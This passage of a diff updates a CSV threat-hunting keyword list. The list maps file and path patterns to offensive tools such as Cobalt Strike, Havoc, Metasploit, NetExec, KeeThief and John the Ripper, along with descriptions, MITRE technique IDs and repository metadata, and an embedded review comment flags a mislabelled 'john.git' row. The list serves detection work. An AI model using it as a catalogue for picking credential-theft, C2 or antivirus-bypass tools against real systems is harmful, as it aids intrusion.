tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*/jasperloader.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*/java/jndi/RMIRefServer.java*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","715","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*/java/jndi/RMIRefServer.java*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. 
you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" "*/jdwp-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/jdwp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/jdwp-inject.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -4081,17 +4103,17 @@ "*/Jira-Lens.git*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" "*/Jira-Lens/*","offensive_tool_keyword","RedTeam_toolkit","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" "*/JoelGMSec/PyShell*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" -"*/john -*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/john -*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/john.git*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - 
T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" -"*/john/run/*.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/john/run/*.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/JohnTheRipper*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/john/run/*.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/john/run/*.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/JohnTheRipper*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
"*/Jormungandr.git*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*/js/stage.js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/js_inject.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/juicypotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/juicypotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/JuicyPotatoNG.git*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" -"*/Jump-exec/Psexec*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/Jump-exec/Psexec*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/K8_CS_*_*.rar*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*/k8gege/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*/k8gege/scrun/*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus 
- FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" 
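Review bot: The context row `*/john.git*` in this hunk is attributed to `ldapdomaindump`, with an LDAP-dumper description, `T1087 - T1005 - T1016` and a link to dirkjanm/ldapdomaindump, while the surrounding `*/john ...` rows all describe John the Ripper with `T1110 - T1003.001` and `https://github.com/openwall/john/`. This looks like a copy error; if so, a hit on that pattern would be triaged as directory enumeration rather than offline password cracking, so the tool, description, techniques and link columns should probably match the other john rows. The same hunk also shows two format inconsistencies that the metadata refresh leaves in place: the `*/js_inject.txt*` row uses empty strings `""` where other rows use `"N/A"` for missing GitHub metadata, and the `*/Jira-Lens*` rows separate technique IDs with bare spaces instead of ` - `. Normalising these would let downstream parsers rely on a single convention per column.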
@@ -4104,37 +4126,39 @@ "*/kdstab.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*/KDStab.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*/KDStab/*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" -"*/keepass_discover_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/keepass_discover.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/keepass_discover_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/keepass_trigger.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/KeeThief.git*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10","","N/A","","","" -"*/kerberoast.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/kerberoast.c*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/kerberoast.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/kerberoast.c*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/kerberoast.c*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - 
TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" -"*/kerberoast.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/kerberoast.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/kerberoast/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/kerberoast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/kerberos.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/kerberoast.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/kerberoast.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/kerberoast/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
